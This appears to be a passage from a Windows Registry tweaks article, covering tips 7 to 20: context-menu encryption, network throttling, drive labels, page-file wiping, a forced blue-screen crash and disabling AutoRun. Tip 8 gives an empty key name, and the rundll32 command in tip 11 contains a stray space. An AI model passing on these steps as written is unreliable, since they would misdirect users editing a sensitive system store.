Some versions of Windows have always allowed you to encrypt files, but it's an awkward process; you must right-click the file, select 'Properties', click the 'Advanced' button, check 'Encrypt contents to secure data' and then press 'OK' twice.

For a simpler alternative, go to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced', create a new DWORD called 'EncryptionContextMenu' and set it to 1. Now you can just right-click a file and select 'Encrypt'.

8. Access folders fast

Get speedy access to any folder by pinning it to the Start menu. Run REGEDIT, go to 'HKCR\Folder\shellex\ContextMenuHandlers', right-click 'ContextMenuHandlers' and click 'New | Key'.

Type '' (as ever, without quotation marks) and press [Enter]. Now hold down [Shift], right-click a folder and select 'Pin to Start Menu'.

9. Speed up copy times

Vista gives a high priority to your soundcard, so you should get glitch-free audio no matter what you're doing. This can cause slower network copy speeds, however.

To tweak this, browse to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Multimedia\SystemProfile'. Try setting 'NetworkThrottlingIndex' to more than 10 – 50 or 60 should be effective – then reboot and test your network speeds again. Read more here.

10. Fix the drive listing

If Explorer no longer lists your DVD drive (or thinks that it's a DVD-ROM and can't burn discs), go to 'HKLM\System\CurrentControlSet\Control\Class\' and delete the 'UpperFilters' or 'LowerFilters' settings.

This usually works, but it may break whatever application caused the problem in the first place. If a program stops working, check to see if it has an update, then reinstall it.

11. Access display settings quickly

Right-click the desktop in Windows Vista and you can't directly access the display settings. Windows 7 will fix this, but in the meantime go to 'HKCR\Directory\Background\Shell', right-click 'Shell', select 'New | Key' and call it 'Display Settings'.

Double-click '(Default)' in the right-hand pane and enter 'Display Settings' in the Value Data box. Now right-click Display Settings in the left-hand pane, select 'New | Key' again and call this key 'command'.

Double-click this new key's (Default) value and enter this text: 'rundll32 shell32.dll,Control_ RunDLL DESK.CPL,@0,3'. (That's a zero following the @ sign, and take care to use the right cases.) Click 'OK' and right-click the desktop to see the new Display Settings option.

12. Multiple Live Messenger log-ins

By default, Windows Live Messenger only lets you log into one account at a time. To rectify this situation, go to 'HKLM\Software\Microsoft\WindowsLive\Messenger', create a DWORD value called 'Multiple Instances' and set it to 1. Delete the value to restore things to the way they were beforehand.

13. Clean the menus

You've uninstalled an application, but it's left you a gift: several now-useless right-click context menu entries. To fix this, go to 'HKCR\*' and 'HKCR\Directory'. Expand the shell, then the 'shellex\ContextMenuHandlers' keys and look for any keys beneath these that relate to your unwanted command.

On our PC, the key 'HKCR\*\shellex\ContextMenuHandlers\7-Zip' links to the 7-Zip context menu, for instance, so to get rid of that we would right-click the 7-Zip part in the left-hand pane and click 'Delete'. But be careful – only delete a key if you're really sure it's the right one.

14. Speed up backups

Windows XP's NTBACKUP improves its performance by maintaining a list of system files it knows you won't want to back up (such as the paging file). Add your own files and folders that you're not bothered about and you'll get even better results.

View the list at 'HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup'.

15. Change the default installation folder

Most installations default to the Program Files folder, but if you want to point this elsewhere, navigate to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion', change the 'ProgramFilesDir' entry to point at your chosen folder and reboot.

16. Rename drives

Add a memory card reader to a PC and Explorer will often cram the Computer folder with similar sounding drive names ('Removable Drive D:', 'Removable Drive E:' and so on), making it difficult to tell them apart. But it doesn't have to be that way.

If drive G: is a CompactFlash slot, say, then a few Registry tweaks can change it to read 'CompactFlash (G:)', making things much clearer. Start at 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' and create a key called 'DriveIcons'.

Within that, create a key with the drive letter ('G' in this example), and within that, create a new key called 'DefaultLabel'. Double-click this key's (Default) value entry, give it the name 'CompactFlash' (or whatever you like) and click 'OK'. Restart Explorer or press [F5] to see the change.

17. Wipe the page file

Windows stores memory pages in its paging file as you work. That's fine unless an intruder gets access to your system. If so, they may then be able to browse the paging file and extract confidential information.

To avoid this, go to 'HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement', set the 'ClearPageFileAtShutdown' value to 1 and reboot. Windows will now wipe the page file every time it shuts down, lengthening the process but increasing your security.

18. Crash on cue

Blue-screen crashes are usually bad news, but occasionally you might want to initiate one yourself. You might need to test Windows' error reporting, for example. There's a Registry trick that can help achieve this.

Go to 'HKLM\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters', create a DWORD called 'CrashOnCtrlScroll' and set it to 1. Reboot your computer, and to crash it just hold down the right [CTRL] and press [Scroll Lock] twice. Use this sparingly: it's a crash like any other, and there's a chance of hard drive corruption. To be safe, delete the CrashOnCtrlScroll value when you're done.

19. Save CPU time

The average PC has several programs wanting to use the processor at any one time, and so Windows allocates each a period of CPU time – a 'quantum' – before moving to the next. By default this is very short, which makes for a responsive PC, but it sometimes means that Windows wastes time just switching between processes.

The solution? You can try what Windows Server does: set up your system to use a long quantum. Set 'HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl\Win32PrioritySeparation' to 16 (hex).

Longer quantums mean fewer switches between programs and so less wasted time. It can push some programs too far, though, and you might begin to notice games lagging or video playback becoming less smooth. If you spot any problems, just restore the original Win32PrioritySeparation value (probably 26 hex).

20. Disable AutoRun

Windows' AutoRun feature is a potential security risk because it automatically runs code when you connect removable devices to your PC. If you can put up with the inconvenience of doing things manually then it's safest to disable it.

On some systems, this can only be done from the Registry. To do so, go to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\IniFileMapping' and create a key called 'Autorun.inf'.

Next, double-click the new key's (Default) value and enter the new value '@SYS:DoesNotExist'. Now delete the Registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2'. Windows now won't automatically run any code on CDs, DVDs or removable drives; you will have to manually launch it.

Related Posts with Thumbnails
When reproducing our materials in whole or in part, hyperlink to the articles should be strictly made Creative Commons License This work is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 2.5 India License.